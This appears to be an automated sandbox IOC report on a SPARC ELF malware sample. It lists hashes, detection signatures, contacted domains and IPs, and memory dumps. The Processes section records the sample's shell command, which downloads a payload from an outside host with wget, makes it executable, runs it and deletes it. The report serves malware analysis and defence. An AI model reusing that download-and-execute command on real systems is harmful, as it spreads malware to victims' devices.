Automated Malware Analysis IOC Report for

Files

File Path

Type

Category

Malicious

sparc.elf

ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, with debug_info, not stripped

initial sample

Details

Filetype:	ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, with debug_info, not stripped
Entropy:	6.031290600782372
Filename:	sparc.elf
Filesize:	145318
MD5:	c09ac08b37b21952700b5bed4ba6e3e4
SHA1:	e68be4ed7323cece5497836ad6bb3394cd4150d6
SHA256:	a8bef58f3eba5200834f4e4d32925492849a60dd8b7f5db792115f717f3ca099
SHA512:	9bbb06b2b207e3a6b58ba1f2b9128618b9746701dc30b55ff52f99bcbb984dc497230506a5a7bdf3203bad761c4b3c93e50807c775f0b3de65349089979b09cc
SSDEEP:	1536:/+9fsTcb6nyaw6cC9X1jgBe+wwJiGqgtIFVtHCcgscyewQ7g8mUwMtiIb8OxNu:Neot9Ue+igHRscRLmUwMtrwiNu
Preview:	.ELF...........................4.........4. ...(..........................................................l.........dt.Q................................@..(....@.\.................#.....a...`.....!.....!...@.....".........`......$!...!...@...........`....

Signature Hits	Behavior Group	Mitre Attack
Antivirus / Scanner detection for submitted sample	AV Detection
Malicious sample detected (through community Yara rule)	System Summary
Multi AV Scanner detection for submitted file	AV Detection
Opens /proc/net/* files useful for finding connected devices and routers	Spreading	Remote System Discovery
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior	Scripting
Uses the "uname" system call to query kernel version information (possible evasion)	Malware Analysis System Evasion	Security Software Discovery
Yara signature match	System Summary
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)	Malware Analysis System Evasion
Sample and/or dropped files contains symbols with file path information	System Summary

/tmp/qemu-open.9b9o37 (deleted)

ASCII text

dropped

Details

File:	/tmp/qemu-open.9b9o37 (deleted)
Category:	dropped
Dump:	qemu-open.9b9o37 (deleted).12.dr
ID:	dr_0
Target ID:	12
Process:	/tmp/sparc.elf
Type:	ASCII text
Entropy:	3.709552666863289
Encrypted:	false
Ssdeep:	6:iekrEcvwAsE5KlwSd4pzKaV6Lpms/a/1VCxGF:ur+m5MwSdIKaV6L1adVRF
Size:	230
Whitelisted:	false
Reputation:	moderate

Processes

Path

Cmdline

Malicious

/tmp/sparc.elf

/bin/sh

/bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."

/bin/sh

/usr/bin/wget

wget -q http://gay.energy/.../vivid -O .....

/bin/sh

/usr/bin/chmod

chmod 777 .....

/bin/sh

/bin/sh ./.....

/bin/sh

/usr/bin/rm

rm -rf .....

/tmp/sparc.elf

There are 4 hidden processes, click here to show them.

Domains

Name

Malicious

gay.energy

unknown

Details

Name:	gay.energy
TargetID:	-1

Signature Hits	Behavior Group	Mitre Attack
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior	Scripting
Executes the "wget" command typically used for HTTP/S downloading	Networking, Persistence and Installation Behavior	Application Layer Protocol
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol

daisy.ubuntu.com

162.213.35.25

Details

Name:	daisy.ubuntu.com
IP:	162.213.35.25
TargetID:	-1
Active:	true
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol

IPs

Domain

Country

Malicious

92.60.77.69

unknown

Italy

Details

IP:	92.60.77.69
TargetID:	-1
Country:	Italy
Countrycode:	ITA
ASN number:	5602
ASN name:	AS-IRIDEOS-KPIT
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Suricata IDS alerts for network traffic	Networking
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port
Connects to IPs without corresponding DNS lookups	Networking

Memdumps

Base Address

Regiontype

Protect

Malicious

7f694c02d000

page execute read

7f694c02d000

page execute read

7f694c02d000

page execute read

55774c52f000

page read and write

7f6a52b29000

page read and write

55774a511000

page read and write

55774a511000

page read and write

7f6a52029000

page read and write

7f6a52b6e000

page read and write

55774c52f000

page read and write

7f6a52037000

page read and write

7f6a52029000

page read and write

7fff6d3bb000

page execute read

55774a2e3000

page execute read

7f694c045000

page read and write

7f6a52b29000

page read and write

7f6a4c000000

page read and write

7f6a529f8000

page read and write

7f694c045000

page read and write

7f6a529f8000

page read and write

55774a51a000

page read and write

7f694c03e000

page read and write

7f6a52688000

page read and write

7f6a51826000

page read and write

7f6a52029000

page read and write

7fff6d2e6000

page read and write

7f694c045000

page read and write

7f6a52688000

page read and write

55774d938000

page read and write

55774c518000

page execute and read and write

7f6a51826000

page read and write

7f6a52037000

page read and write

55774d938000

page read and write

7f6a52037000

page read and write

55774a511000

page read and write

7f694c03e000

page read and write

7f6a522c6000

page read and write

7f6a4c021000

page read and write

7f6a52b6e000

page read and write

7f6a4c000000

page read and write

7fff6d3bb000

page execute read

55774c518000

page execute and read and write

7f6a4c021000

page read and write

7f6a522c6000

page read and write

55774a51a000

page read and write

7fff6d3bb000

page execute read

7f6a4c000000

page read and write

55774a51a000

page read and write

55774a2e3000

page execute read

7f6a52b21000

page read and write

55774c518000

page execute and read and write

7f6a51826000

page read and write

7f6a52b21000

page read and write

7f6a4c021000

page read and write

7f6a526ad000

page read and write

7f6a52b21000

page read and write

55774a2e3000

page execute read

7fff6d2e6000

page read and write

7f6a526ad000

page read and write

7f6a52b29000

page read and write

7f6a529f8000

page read and write

7f6a52688000

page read and write

7f6a522c6000

page read and write

7f6a526ad000

page read and write

7fff6d2e6000

page read and write

7f694c03e000

page read and write

55774c52f000

page read and write

7f6a52b6e000

page read and write

55774d938000

page read and write

There are 59 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
sparc.elf

Files

Processes

Domains

IPs

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Reportsparc.elf

Files

Processes

Domains

IPs

Memdumps

IOC Report
sparc.elf